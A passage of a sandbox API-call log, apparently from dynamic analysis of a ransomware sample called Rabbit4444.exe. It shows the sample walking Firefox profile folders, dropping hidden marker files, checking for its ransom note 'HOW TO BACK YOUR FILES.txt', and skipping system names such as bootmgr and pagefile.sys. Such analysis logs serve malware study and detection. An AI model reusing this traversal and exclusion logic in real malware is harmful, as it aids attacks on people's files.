dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.251] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.251] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.251] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.251] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.251] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe8762357, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.251] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.251] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.251] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.251] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.251] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.251] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8762357, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8762357, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.251] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.251] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8762357, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8762357, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.252] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.252] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\events\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.252] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.252] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.252] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.252] CloseHandle (hObject=0x278) returned 1 [0052.252] CloseHandle (hObject=0x27c) returned 1 [0052.252] GetCurrentThreadId () returned 0xd98 [0052.253] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63f0 [0052.253] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" [0052.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0052.253] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63e8 | out: hHeap=0xe0000) returned 1 [0052.253] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" [0052.253] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\" [0052.253] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3" [0052.253] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\bookmarkbackups\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.254] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.256] FlushFileBuffers (hFile=0x27c) returned 1 [0052.257] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.257] CloseHandle (hObject=0x27c) returned 1 [0052.258] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned 89 [0052.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.258] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.258] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.258] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.258] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.258] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.258] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.258] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.258] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.258] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.258] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.258] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.258] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87885a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87885a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.258] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.258] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87885a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87885a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.258] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.259] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.259] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\bookmarkbackups\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.259] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.259] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.259] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.259] CloseHandle (hObject=0x278) returned 1 [0052.260] CloseHandle (hObject=0x27c) returned 1 [0052.260] GetCurrentThreadId () returned 0xd98 [0052.260] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf63b0 [0052.260] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" [0052.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0052.260] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf63a8 | out: hHeap=0xe0000) returned 1 [0052.260] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" [0052.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\" [0052.260] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3" [0052.260] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\pending pings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.263] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.266] FlushFileBuffers (hFile=0x27c) returned 1 [0052.267] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.267] CloseHandle (hObject=0x27c) returned 1 [0052.267] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned 61 [0052.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.267] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0052.268] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.268] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.268] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.268] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.268] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87885a2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.268] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.268] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.268] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.268] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.268] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.268] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87885a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87885a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87ae83f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.268] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.268] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87885a2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87885a2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87ae83f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.268] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0052.268] lstrcpyW (in: lpString1=0x130ebb4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\pending pings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.269] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.269] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.269] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.269] CloseHandle (hObject=0x278) returned 1 [0052.269] CloseHandle (hObject=0x27c) returned 1 [0052.269] GetCurrentThreadId () returned 0xd98 [0052.269] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0052.269] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0052.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0052.269] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0052.269] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports" [0052.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0052.269] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3" [0052.269] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\crash reports\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.272] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.275] FlushFileBuffers (hFile=0x27c) returned 1 [0052.275] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.276] CloseHandle (hObject=0x27c) returned 1 [0052.276] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports") returned 61 [0052.276] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.276] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87ae83f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0052.276] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.276] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.276] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.276] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.276] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe87ae83f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.276] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.276] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.277] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.277] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.277] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.277] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe87ae83f, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe87ae83f, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe87ae83f, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.277] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.277] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="events", cAlternateFileName="")) returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.277] lstrcmpiW (lpString1="events", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="Rabbit4444.exe") returned -1 [0052.277] lstrcmpiW (lpString1="events", lpString2=".") returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="..") returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="windows") returned -1 [0052.277] lstrcmpiW (lpString1="events", lpString2="bootmgr") returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="pagefile.sys") returned -1 [0052.277] lstrcmpiW (lpString1="events", lpString2="boot") returned 1 [0052.277] lstrcmpiW (lpString1="events", lpString2="ids.txt") returned -1 [0052.277] lstrcmpiW 